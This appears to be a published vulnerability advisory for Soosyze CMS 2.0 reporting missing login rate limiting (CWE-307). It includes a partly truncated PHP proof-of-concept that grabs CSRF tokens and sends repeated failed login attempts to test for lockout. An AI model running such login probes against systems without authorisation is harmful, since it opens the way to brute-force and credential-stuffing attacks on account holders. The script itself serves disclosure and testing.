============================================================================================================================================= | # Title : Soosyze CMS 2.0 - Vulnerability Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://github.com/soosyze/soosyze | ============================================================================================================================================= [+] Summary : Soosyze CMS 2.0 suffers from a missing authentication rate‑limiting vulnerability (CWE‑307) on the /user/login endpoint. The application allows unlimited failed login attempts without triggering protections such as rate limiting, account lockout, or CAPTCHA. The provided automatic detection script (PHP) safely verifies this weakness by sending a small number of controlled failed login attempts and analyzing HTTP responses. If responses remain consistent (e.g., HTTP 200 with no delay or blocking), the target is flagged as vulnerable, confirming the absence of defensive controls. [+] Impact: Enables brute-force and credential‑stuffing attacks, potentially leading to account takeover and privilege escalation. [+] POC: php poc.php true, CURLOPT_HEADER => true, CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, ] + $opts); $response = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); return [$response ?: '', $info]; } function extractToken(string $html): array { if (preg_match( '/name="([_a-zA-Z0-9:-]*(csrf|token)[_a-zA-Z0-9:-]*)".*?value="([^"]*)"/i', $html, $m )) { return [$m[1], $m[3]]; } return ['', '']; } echo "[*] Soosyze CMS Brute Force Vulnerability Detector\n"; echo "[*] Target: {$formUrl}\n\n"; $codes = []; for ($i = 1; $i <= $attempts; $i++) { [$page, ] = curlReq($formUrl, [ CURLOPT_COOKIEJAR => $cookieFile, CURLOPT_COOKIEFILE => $cookieFile ]); [$tokenName, $tokenValue] = extractToken($page); $postData = [ 'email' => $testEmail, 'password' => $testPass ]; if ($tokenName) { $postData[$tokenName] = $tokenValue; } [, $info] = curlReq($formUrl, [ CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($postData), CURLOPT_COOKIEJAR => $cookieFile, CURLOPT_COOKIEFILE => $cookieFile, CURLOPT_HTTPHEADER => [ 'Content-Type: application/x-www-form-urlencoded', 'Referer: ' . $formUrl ] ]); $code = $info['http_code'] ?? 0; $codes[] = $code; echo "[{$i}] Failed login attempt - HTTP {$code}\n"; usleep($delayUs); } @unlink($cookieFile); $uniqueCodes = array_unique($codes); echo "\n[*] Analysis:\n"; if (count($uniqueCodes) === 1 && in_array(200, $uniqueCodes, true)) { echo "[!] VULNERABLE: No rate limiting or lockout detected\n"; echo "[!] CWE-307 confirmed\n"; } else { echo "[+] Protection detected (rate limiting / lockout / anomaly)\n"; } echo "\n[*] Scan completed\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================